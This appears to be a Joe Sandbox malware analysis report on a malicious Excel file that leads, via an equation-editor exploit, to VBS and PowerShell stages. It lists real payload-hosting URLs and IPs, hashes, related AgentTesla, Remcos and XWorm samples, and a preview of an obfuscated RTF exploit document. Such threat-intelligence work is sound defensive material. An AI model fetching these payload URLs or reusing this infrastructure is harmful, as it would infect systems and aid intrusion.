uploaddeimagens.com.br	172.67.215.45	true	true	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.92.244.96/LEO/CLO/microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doC	true	Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907	true	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.92.244.96/LEO/Leoloverme.vbs	true	Avira URL Cloud: safe	unknown
http://paste.ee/d/kmRFs	false		high
https://paste.ee/d/kmRFs	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://91.92.244.96/LEO/Leoloverme.vbsooC:	EQNEDT32.EXE, 0000000C.00000002.493175529.000000000065F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000012.00000002.513548270.0000000003809000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	false		high
http://91.92.244.96/LEO/Leoloverme.vbsm	EQNEDT32.EXE, 0000000C.00000002.493175529.0000000000687000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.92.244.96/LEO/Leoloverme.vbsj	EQNEDT32.EXE, 0000000C.00000002.493378697.0000000003530000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000012.00000002.513548270.0000000003809000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com;	wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://contoso.com/Icon	powershell.exe, 00000012.00000002.513548270.0000000003809000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.92.244.96/LEO/CLO/microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdatio	microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doC.url.4.dr	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://analytics.paste.ee	wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	false		high
http://91.92.244.96/LEO/CLOC:	rundll32.exe, 00000006.00000002.479489337.0000000000300000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.92.244.96/LEO/CLO/microballonu	P018400.xla.xlsx	false	Avira URL Cloud: safe	unknown
http://91.92.244.96/LEO/CLOME=user-PCComSpec=C:	rundll32.exe, 00000006.00000002.479572774.0000000000574000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg	powershell.exe, 00000012.00000002.513167919.0000000000536000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.513548270.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.92.244.96/LEO/CLO	rundll32.exe, 00000006.00000002.479489337.0000000000372000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.479489337.0000000000300000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.google.com	wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.92.244.96/LEO/CLO/	CLO on 91.92.244.96.url.4.dr	false	Avira URL Cloud: safe	unknown
http://tempuri.org/BD_AUTOMCAODataSet1.xsd	powershell.exe, 00000012.00000002.515557442.0000000006430000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000012.00000002.554595769.000000000DA9A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br	powershell.exe, 00000012.00000002.513548270.000000000291A000.00000004.00000800.00020000.00000000.sdmp	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.92.244.96/LEO/CLO3	rundll32.exe, 00000006.00000002.479489337.000000000033E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.92.244.96/LEO/CLO4	rundll32.exe, 00000006.00000002.479489337.0000000000300000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000012.00000002.513548270.0000000003809000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000012.00000002.513548270.0000000003809000.00000004.00000800.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_u	powershell.exe, 00000012.00000002.515184952.0000000004CF5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com	wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paste.ee/d/kmRFs5-V	wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://ocsp.entrust.net0D	wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000010.00000002.586909337.00000000027F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.513548270.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.92.244.96	unknown	Bulgaria	34368	THEZONEBG	true
104.21.84.67	paste.ee	United States	13335	CLOUDFLARENETUS	false
172.67.215.45	uploaddeimagens.com.br	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1391417
Start date and time:	2024-02-13 15:06:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	P018400.xla.xlsx
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winXLSX@19/31@3/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 22 Number of non-executed functions: 7
Cookbook Comments:	Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
Execution Graph export aborted for target powershell.exe, PID 1700 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2856 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:07:54	API Interceptor	4x Sleep call for process: rundll32.exe modified
15:07:59	API Interceptor	31x Sleep call for process: EQNEDT32.EXE modified
15:08:00	API Interceptor	18x Sleep call for process: wscript.exe modified
15:08:02	API Interceptor	206x Sleep call for process: powershell.exe modified
15:08:08	API Interceptor	272x Sleep call for process: AcroRd32.exe modified
15:08:43	API Interceptor	38x Sleep call for process: RdrCEF.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.92.244.96	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	91.92.244.96/3566/loverhappy.vbs
104.21.84.67	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/cJo7v
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/EgkAG
	87645345.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/IJGyf
	182763543.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/0kkOm
	PaymentEUR41000.xls	Get hash	malicious	Remcos	Browse	paste.ee/d/oVqcS
	RFQ-#Uacac#Uc801#Uc758#Ub8b0#Uc11c-#Uacac#Uc801#Uc758#Ub8b0#Uc11c.vbs	Get hash	malicious	Remcos	Browse	paste.ee/d/6VwxD
	240202PIMXF24C.docx.doc	Get hash	malicious	Remcos	Browse	paste.ee/d/wPDYR
	Purchase Order202428 (1).xls	Get hash	malicious	Remcos	Browse	paste.ee/d/pQbyK
	Applicazione di pagamento.docx.doc	Get hash	malicious	Remcos	Browse	paste.ee/d/7tUhO
	loveactiondrama.vbs	Get hash	malicious	Remcos	Browse	paste.ee/d/7tUhO
172.67.215.45	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse
	wsf.zip	Get hash	malicious	Remcos	Browse
	66432890.vbs	Get hash	malicious	Unknown	Browse
	1e#U041e.vbs	Get hash	malicious	AgentTesla	Browse
	751652433.vbs	Get hash	malicious	XWorm	Browse
	PaymentEUR41000.xls	Get hash	malicious	Remcos	Browse
	orden00878t9.xlam.xlsx	Get hash	malicious	AgentTesla	Browse
	Purchase Order202428 (1).xls	Get hash	malicious	Remcos	Browse
	CONSULTA DE PRECIOS DE CEPROMA.xlam.xlsx	Get hash	malicious	AgentTesla	Browse
	Nuevo pedido_BR-RWU-2-6.xlam.xlsx	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
paste.ee	517209487.vbs	Get hash	malicious	XWorm	Browse	172.67.187.200
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67
	wsf.zip	Get hash	malicious	Remcos	Browse	104.21.84.67
	screen_shots.vbs	Get hash	malicious	XWorm	Browse	172.67.187.200
	wsf.zip	Get hash	malicious	Remcos	Browse	172.67.187.200
	66432890.vbs	Get hash	malicious	Unknown	Browse	172.67.187.200
	87645345.vbs	Get hash	malicious	XWorm	Browse	104.21.84.67
	96874650.vbs	Get hash	malicious	XWorm	Browse	172.67.187.200
	1e#U041e.vbs	Get hash	malicious	AgentTesla	Browse	172.67.187.200
uploaddeimagens.com.br	517209487.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	wsf.zip	Get hash	malicious	Remcos	Browse	172.67.215.45
	66432890.vbs	Get hash	malicious	Unknown	Browse	172.67.215.45
	87645345.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	1e#U041e.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	751652433.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	387165243.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	cotizaci#U00f3n para nuevo pedido.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://www.profitablegatecpm.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	Banka odeme havale makbuzu 20240213 TL950000900.exe	Get hash	malicious	FormBook	Browse	172.67.220.175
	https://sites.google.com/view/centregreatlimited/home	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	517209487.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	NEW PURCHASE ORDER #024.scr	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Scanned Docs#U007eSHYD-231214453#U007eYD-B8243 70-30#U007eCFR#U007eDrums.exe	Get hash	malicious	GuLoader, Remcos	Browse	172.67.164.124
	IMG00078901PDF.vbs	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	ORDER #4059212650 - 2.13.2024.scr	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Booking05052.vbs	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.84.67
THEZONEBG	PO-65547.js	Get hash	malicious	WSHRAT	Browse	91.92.249.69
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	91.92.244.96
	3DU64tLdkc.exe	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	91.92.245.153
	document.jpg.lnk	Get hash	malicious	Reverse SSH	Browse	91.92.248.36
	Tax Returns Of R38,765.js	Get hash	malicious	WSHRAT	Browse	91.92.249.69
	Sample PDF.pdf.lnk	Get hash	malicious	MalLnk	Browse	91.92.248.36
	sTsbAmON9u.exe	Get hash	malicious	LummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, Xmrig	Browse	91.92.244.55
	amONbBvdCh.exe	Get hash	malicious	LummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, Xmrig	Browse	91.92.244.55
	LxZnz7uTCN.exe	Get hash	malicious	RedLine	Browse	91.92.244.55
	hesaphareketi-01.(170K).pdf.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.255.235
CLOUDFLARENETUS	http://www.profitablegatecpm.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	Banka odeme havale makbuzu 20240213 TL950000900.exe	Get hash	malicious	FormBook	Browse	172.67.220.175
	https://sites.google.com/view/centregreatlimited/home	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	517209487.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	NEW PURCHASE ORDER #024.scr	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Scanned Docs#U007eSHYD-231214453#U007eYD-B8243 70-30#U007eCFR#U007eDrums.exe	Get hash	malicious	GuLoader, Remcos	Browse	172.67.164.124
	IMG00078901PDF.vbs	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	ORDER #4059212650 - 2.13.2024.scr	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Booking05052.vbs	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.84.67

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.84.67 172.67.215.45
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67 172.67.215.45
	cotizaci#U00f3n para nuevo pedido.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.84.67 172.67.215.45
	PaymentEUR41000.xls	Get hash	malicious	Remcos	Browse	104.21.84.67 172.67.215.45
	Yeni fatura.docx.doc	Get hash	malicious	Remcos	Browse	104.21.84.67 172.67.215.45
	Purchase Order#2354789.xls	Get hash	malicious	Remcos	Browse	104.21.84.67 172.67.215.45
	240202PIMXF24C.docx.doc	Get hash	malicious	Remcos	Browse	104.21.84.67 172.67.215.45
	orden00878t9.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.84.67 172.67.215.45
	Debit note.xls	Get hash	malicious	Lokibot, Strela Stealer	Browse	104.21.84.67 172.67.215.45
	Purchase Order202428 (1).xls	Get hash	malicious	Remcos	Browse	104.21.84.67 172.67.215.45

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	modified
Size (bytes):	131072
Entropy (8bit):	0.005597679101775777
Encrypted:	false
SSDEEP:	3:ImtVOM1xVlt/XSxdltIt/l:IiVfxlKxdXI1l
MD5:	FD55D575475A6BD81B055F46FA34BA8B
SHA1:	289A6344929F221E19D2F9097A5907FE42C03855
SHA-256:	261CE45767DBF1E61AAF67C5EC1D75C2FF5C02681DF96897D5B0EC56A0F8C2AB
SHA-512:	F2247D89C3268E838AE6F4BCDC1C4BB9C60E4F2E05B1763CD152811661A00B8BFC467F71009894676E38CE31229DF35F6FC9F2F19C2911698012D0594697F098
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	VLnk.....?......LhXJ ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	128373
Entropy (8bit):	1.984352562880039
Encrypted:	false
SSDEEP:	384:hNzyk+spBXiosQUYuoB7OdnGbLq+ACtKzZQ9w/fQ1D+v+W2gnHwvAgIEyXG1oJ/J:nUwvgnHwvAP
MD5:	B4621E956E08FFC84D8E099B27014FEE
SHA1:	CB4604EED70C03ABADD11C5EF15E566B8A9802E4
SHA-256:	0C42B243A4C3673436D22F0C51033E2306005CDB0CFCB82A849452BD3E741CF7
SHA-512:	A99A6769B42241891C83EDD62CD4E4027BBF2F5BC716B4ED01CFDBE7312526C5DA8A3D37EB2D471C0A707952A6D8C9143A921FA7428B9F46105583549540DC47
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	Adobe Acrobat Reader DC 19.0....?A12_SelectObject.................................................................................................................................................~~~@~~~ ........................................................................................~~~.~~~.~~~.....................................................................................~~~.~~~.~~~.~~~`................................................................................~~~.~~~.~~~.~~~.~~~`............................................................................~~~.~~~.~~~.~~~.~~~.~~~@........................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~0....................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~0................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.............................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02563227505048538
Encrypted:	false
SSDEEP:	6:I3DPcwDm1HvxggLRVzyzp3/RXv//4tfnRujlw//+GtluJ/eRuj:I3DP3DmRh23pvYg3J/
MD5:	6454A81AC770C95A5838F6E6C923CD45
SHA1:	2AFA51262467CB201EDADCF437E5392BE00C8A71
SHA-256:	A865C1DE2F903184310E1502814A559557BA8B7D5AED431BD3B032A5DBC6DD9A
SHA-512:	B3B53FE4430647DAA52D565FC45542BE293AF3A24E32187AD0DD8B123F5CC39773DE515EF5EEC85F2055165B430946458B20545561B8927D157FAC0DAB755688
Malicious:	false
Preview:	......M.eFy...z..Y..5gJ...4....S,...X.F...Fa.q...............................*.Y.O. .'mW.d........t....}eN.P.W.........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4760
Entropy (8bit):	4.831175347448903
Encrypted:	false
SSDEEP:	96:ACJ2Woe5v2k6Lm5emmXIGbgyg12jDs+un/iQLEYFjDaeWJ6KGcmXoFRLcU6/KD:vxoe5vVsm5emdkgkjDt4iWN3yBGHUdcY
MD5:	A50F0B3600A83789D28B424D69626266
SHA1:	0183DA34933788FF97602C9DEA82F39CAD0697C2
SHA-256:	7B188A9EEAC0649E088208C137625F64175EDAC8AE7F25D8A0F8B5611C824A8A
SHA-512:	335DCAA6FE83BC0F492B353C036EA2A5CA52ECE628520A3E50BAF7C373D4CDBAC7585341D91D9B210C3EC4378525AA934CCB5BB418C4D776105FBB59F4873216
Malicious:	false
Preview:	PSMODULECACHE......%+./...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........%+./...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan[1].doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ISO-8859 text, with very long lines (7451), with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	69960
Entropy (8bit):	3.1658377904674895
Encrypted:	false
SSDEEP:	1536:MT7P5PjYFb39aHozRjXkz4lY8ii+AMQKpE:KR0PdjpY8iitMtE
MD5:	7DC524B6306D0D04114C3385CD20DA18
SHA1:	7F90E09D279D429C3D4C9363BC99DAB18BEC387B
SHA-256:	124BA73A2974E50A6E6DFD748A826FF5330FB8609DC7332788815B4E089F6DC2
SHA-512:	5ABAA6D73EFFAD4D2A64D66EA1B76B90653EBBDE442128D36679E34E8F9EE5D9E3D9874381F9317DDD857094EFC1B446D66254E6A7785B6FA4EFE31592E50E37
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan[1].doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rt...........{\\bWModeBW539536352 \!}.{\644337887?_[7..#0)4?]@<%2?[:@[%><]#>&9..&79?!9`.[?92?,-.\|/79,:!_^$>^7%%3^;]?.&17<1%+2.5!?&?@+4(341&)?0?8+^.&[@?$]^;4;%!9@8+9~7_(636>0##([)9.?-5.82:7.?+?+?0&^&9?.9?-#?@.=@194.26-!(/.$68/%?>5?%&(8.<&-;),]](4^&/0-3[2!>@0$%()?%2\|$??(.?@3_9?\|3.`?]./\|!@@~4.7##-(.?\|?-%`3?[!;)%)81.:`5%=?+%?5#$.-?!?(?>;???..6:-?`?8.[<>%;<.%[7.~&.?';?3%:._%`??6?]/'@&$8?1@>'%?~(?!?$+?#?.._8<1?6.)]~:=%.?7.)).^.?+`^+38).1..+?9%6(?&%,13;'+8^6%?,!@.?..~?,7?/=@&9(4.4->'29&!.%_8<<?[<#%4??5?9.:'`>4;%=.-.?'./0=;/,?,-!60(.?_,_.7@>9]7.%#)3%1%.$5$~?>,..4]=?.5.>8[?;:6]&><$>.;$~@6%8&??15[,5%7_^#.%8.+`$;_1?\|[,.~%[<~...8@80$(5<3)3`?]@@]?~5/@?=)(^47?19%!;/[8(..2.5?[)/.49;5???)59!36<+?<0:/%)-9_%.??<!;4$.>\|5%?.`[??]%1(82<3]7;7]?.%3$3+[+3.,:^##0;>..(&;/>(/]6>8%08-%@^76?=&4:?@?=%`+-63]</[@%\|6?5>-\|].(.'),[...,30+3(.]=3?,.5?3@9,]+7-@..:[4%.[[[&?>):.<4?&%?/^?<?;]7../?]!:5.56,%!_??%5^#?$`7^@<.>]*,[$=&&&/3=`%1:.%`1.8=%?26?^$9'+10`1%5]5(]<['.>[/$$.3%?\|01`?]4==-.&`.?[47??#2&<5?]

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\Leoloverme[1].vbs

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	658
Entropy (8bit):	3.4835285911495704
Encrypted:	false
SSDEEP:	12:QB17eGmv3zkv7p0++OElgnS9O1tYZ69gDxB1twgDxffFf8fZ:Q/efvjk900E6Pvk6SDxZdDxHFf8fZ
MD5:	9758069476341CB14BC61730BA7AE82C
SHA1:	551349E0C347A85CA37A37511EFF82CC25A8C2CA
